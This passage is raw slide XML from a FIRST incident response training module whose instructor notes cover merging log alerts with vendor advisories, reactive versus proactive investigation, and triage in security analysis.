              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3540ACAE-F874-FE47-AFE6-7107F59A2DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="3905250"/>
            <a:ext cx="5570537" cy="6030913"/>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
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFEE1F5-3000-F846-86AB-AB10F60B2FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{99CA8714-5418-1F40-B067-ACF9BF44353C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14341" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C99A87-7A00-3F44-B039-15DA7BB9D5E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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6" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67EC5F47-5445-AF4A-B052-51050AC1E329}"/>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9AEA29CD-0E8B-BA49-940F-C00E4B6697EE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{385D1714-DCB3-0D46-9EC4-D91D5793E496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="3905250"/>
            <a:ext cx="5570537" cy="6030913"/>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>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sz="2000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Data leaving previous stages in the pipeline may not be directly actionable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC7403CF-22C1-D040-91FE-B3E61F831B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{8A97A2A7-795C-5741-A10C-454DF9999AA3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86362ED7-5CA5-4047-93EC-3A8DEA056291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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434" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{737F985E-C041-D54C-A792-BEBBF6397985}"/>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4B298805-EA4C-6245-99F1-F16F1FB380BD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D82F31B-CC26-5944-BC63-D78B017DB904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="3905250"/>
            <a:ext cx="5570537" cy="6030913"/>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Analysis Often Merges Multiple Pipelines: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Your analysis will often involve multiple sources of information coming to you at the same time. In the example above you have information coming from an internal source, an alert from your Web server log. And you also have information coming from an external source, a vendor advisory. These two sources will be processed separately in the Collection, Preparation, and Storage phases. Not until the Analysis phase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>you realize these two separate items are related. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>As shown in the graphic, combining these two datasets will result in a single output from the pipeline, for example an attack signature. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>What examples can we come up with in which we can combine two separate security events into a single result?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Likely you will get many answers, from simple to very creative relationships between quite unrelated sources. And you can also have three or four items merge together. The point is, the more you consider other information, the more likely you are to develop a full understanding of your problem and hence the resolution.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Now that we have established a framework for Analysis, let’s start talking about the first topic: investigation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED121C9C-4C21-7F49-A096-36734F153129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{1C6CE818-85DF-934A-BFC8-5529E4FA8D0F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3E9F52-2327-2A45-970B-CC6D5C96D661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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82" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D833F16-E740-E247-BE18-7FD685BBD1C0}"/>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EE8F8C69-C67C-FD4F-9B3B-A6B0509DDB40}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E203E9E0-3001-CD4A-9003-C3BB54C89250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="3905250"/>
            <a:ext cx="5570537" cy="6030913"/>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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altLang="en-US" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:rPr>
              <a:t>The module focuses on investigations: reactive = IR, proactive = hunting/research.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85F4C28-21F3-DC49-A8D4-E91E4D6B6B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{034DA49D-28BD-1F41-8033-8DA4AADFE811}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3557B2-B547-D34A-8C2B-FB16B0E8A6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C346766-7153-5845-9B70-FE880F0FC7F4}"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{03367411-E49D-964A-89F1-A20849E2EF46}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63489" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A843398B-CA61-8C49-9876-A741D26D8990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287338" y="2947988"/>
            <a:ext cx="6283325" cy="7531100"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Investigation Is a Core Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Most often, you will be in a reactive mode of incident investigation because an alert or other actionable information has arrived. Along with reactive tasks, you will also be doing some proactive investigation, or exploratory analysis. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Reactive investigation is typically required to process any actionable information. One example where investigation is not required is a fully automated system whereby malware signatures arrive from a third party and are fed directly into your detection systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>There are several activities, all of which are vital to your investigative work: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Triage is a very important step. Whenever you become aware of new information, you will have to assess where that new event fits into your prioritized queue, and whether you should continue on your current issue or move to the new one. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Once this particular input is at the top of your priority list, your next step is to determine all additional sources of information needed to allow you to perform analysis and develop conclusions. </a:t>
            </a:r>
          </a:p>
          <a:p>
